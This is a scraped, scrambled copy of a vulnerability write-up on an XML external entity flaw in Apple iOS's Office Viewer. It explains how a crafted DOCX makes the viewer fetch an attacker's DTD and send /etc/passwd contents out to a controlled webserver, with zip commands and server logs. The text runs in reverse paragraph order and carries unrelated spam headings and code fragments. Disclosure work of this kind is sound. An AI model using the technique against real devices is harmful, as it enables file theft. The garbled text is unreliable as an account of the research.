This can be for a number of reasons such as permissions or sandboxing, for instance. So, safari did read the docx, and did read the send.dtd file, but no contents.
Then we create a new entity (you should read the above mentioned PDF, if you haven't yet), that will perform a request to our webserver with the contents as a parameter to the request.Īgain, trying this on a vulnerable iOS.it partially fails: 192.168.1.2 - "GET /xxe.docx HTTP/1.1" 200 -ġ92.168.1.2 - "GET /send.dtd HTTP/1.0" 200. The above file will attempt to read /etc/passwd, and its contents will be in the "file" entity. The above will load a DTD from our controlled server, and then execute the %all and %send entities, which will be defined in the send.dtd file: xml file, and create a specific external DTD file that will allow us to read a file, and get its contents back to us:
#XSS COOKIE VIEWER UPDATE#
So, since the SYSTEM functionality in XML is actually there to load other DTDs, which can define new entities and formats, we update our. This is fun, but can we do anything else ?Īctually, by manipulating entities and parameters, it is possible in some cases to remotely read files out of band. On the first line we see safari accessing the xxe.docx, then it parses it and executes our XXE request. Testing this on a vulnerable iOS by using safari to load the xxe.docx file, we get the confirmation that it works: 192.168.1.2 - "GET /xxe.docx HTTP/1.1" 200 -ġ92.168.1.2 - "GET /XXE HTTP/1.0" 200. If the document parsing application/library is vulnerable to XXE, it will connect via HTTP to the webserver running on 192.168.1.1 port 8000, and request the file "XXE".
#XSS COOKIE VIEWER ZIP#
You just need to update the DOCX file, and it's done: $ zip -u xxe.docx \.xml xml, which will work well for the XXE, by including the following after the first line: Looking at the file structure, you'll see that there are a lot of XML files to play with. Unzipping a DOCX file will create the following structure, that we will change to include our XXE attack: $ unzip xxe.docx
This article will focus specifically on the DOCX file format, but PPTX/XLSX are basically the same, and on other formats the technique is similar. key files or OpenOffice documents, which are basically ZIP archives of multiple XML files. Such is the case of Microsoft Office OOXML files, among other similar file formats such as older Apple Keynote. Our experience tells us that they're quite prevalent in applications, specially when handling files whose format is XML. XML eXternal Entities vulnerabilities are a dime a dozen. For this article we also used safari as an example, but any iOS application that uses the internal Office Viewer (from the QuickLook Framework) should have similar behavior. Also, tests are performed on a jailbroken iOS device for analysis purposes, although later confirmed on a stock ("jailed") iOS. It assumes the reader already has a basic understanding of XXE attacks. This article summarises the discovery and analysis of the XXE vulnerability in Apple iOS Office Viewer ( CVE-2015-3784). Const tag = document.AugXXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)
0 kommentar(er)
